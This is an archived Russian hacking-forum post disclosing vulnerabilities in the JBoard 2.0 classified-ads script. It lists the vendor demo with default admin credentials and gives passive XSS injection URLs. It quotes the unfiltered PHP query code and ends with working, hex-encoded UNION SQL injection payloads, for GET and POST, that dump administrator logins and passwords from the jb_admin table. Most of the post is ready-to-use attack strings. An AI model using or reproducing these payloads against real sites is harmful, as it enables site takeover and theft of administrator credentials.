Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
JBoard Ver.2.0 Коммерческая версия |
03.02.2009, 09:18
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
JBoard Ver.2.0 Коммерческая версия
JBoard Ver.2.0 Коммерческая версия
Офф сайт: http://allpublication.ru/
Demo: http://allpublication.ru/board/demo/
admin;admin
Версия: 2.0
Пассивная XSS
editform.php?notice=<script>alert()</script>
*?user_title=</title><script>alert()</script>
* любые страницы, т.к. уязвимость в inc/head.inc.php
core/edit_user_message.php?edit_user_message="><script> alert()</script><noscript>
SQL-INJ
Присутствует на странице sboard.php
sboard.php :
PHP код:
elseif (!@$_GET['id_mess'] && !@$_GET['id_cat'] && (@$_GET['op'] == "all_cat" || @$_GET['city'])) require_once("core/all_cat.php");
all_cat.php
PHP код:
if ($c['print_top'] == "yes") require_once("inc/top_add.inc.php");
top_add.inc.php
Идет запрос в БД с параметром $_GET['city'], который нигде не фильтруется
PHP код:
if (@$_GET['city'])
{
$from_city_query = mysql_query ("SELECT city_name FROM jb_city WHERE city_translit = '".$_GET['city']."' LIMIT 1");
if (mysql_num_rows ($from_city_query) == 1)
{
$from_city = mysql_fetch_assoc ($from_city_query);
$city_from_search = " AND city = '".$from_city['city_name']."' ";
Результат используется во втором запросе
PHP код:
$top_add = mysql_query ("SELECT A.id as board_id, A.*, B.* FROM jb_board as A, jb_board_cat as B WHERE A.id_category = B.id AND old_mess = 'old' ".@$city_from_search." ORDER by hits DESC LIMIT $limit");
if (mysql_num_rows($top_add))
{
?>
<H4><?=$lang[610]?></H4>
<table border="0" class="GRayBox" cellpadding="0" cellspacing="0">
<tr class="top">
<td class="img1"> </td>
<td class="img2"> </td>
<td class="img3"> </td>
</tr>
<tr>
<td class="imgL"> </td>
<td class="t"><a href="#">
<?
while ($top = mysql_fetch_assoc ($top_add))
{
$tip = str_replace("\r\n"," ", htmlspecialchars($top['text']));
echo "<a href=\"".$h."/advertisement/nesting/".$top['id_category']."/kind/".$top['board_id']."/\" onmouseover=\"Tip('".$tip."')\"><strong>".$top['title']."</strong></a>";
Ядовитый запрос для первого запроса (прям тафталогия):
a' UNION SELECT 1 --
Для второго запроса:
a' UNION SELECT 1,2,3,4,5,6,concat_ws(0x3,login,password),8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34 FROM jb_admin --
Переведем в число(*16):
0x612720554e494f4e2053454c45435420312c322c332c342c 352c362c636f6e6361745f7773283078332c6c6f67696e2c70 617373776f7264292c382c392c31302c31312c31322c31332c 31342c31352c31362c31372c31382c31392c32302c32312c32 322c32332c32342c32352c32362c32372c32382c32392c3330 2c33312c33322c33332c33342046524f4d206a625f61646d69 6e202d2d20
В итоге получаем следующий запрос:
sboard.php?city=a'+union+select+0x612720554e494f4e 2053454c45435420312c322c332c342c352c362c636f6e6361 745f7773283078332c6c6f67696e2c70617373776f7264292c 382c392c31302c31312c31322c31332c31342c31352c31362c 31372c31382c31392c32302c32312c32322c32332c32342c32 352c32362c32372c32382c32392c33302c33312c33322c3333 2c33342046524f4d206a625f61646d696e202d2d20%20--%20
SQL-INJ
POST запрос к /core/select.php
aaaaaaa' UNION SELECT 1,2,concat_ws(0x3,login,password),4,5,6 FROM jb_admin --
Вывод будет в последнем элементе выпадающего списка
Уязвимый кусок кода: целиком весь файл)
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид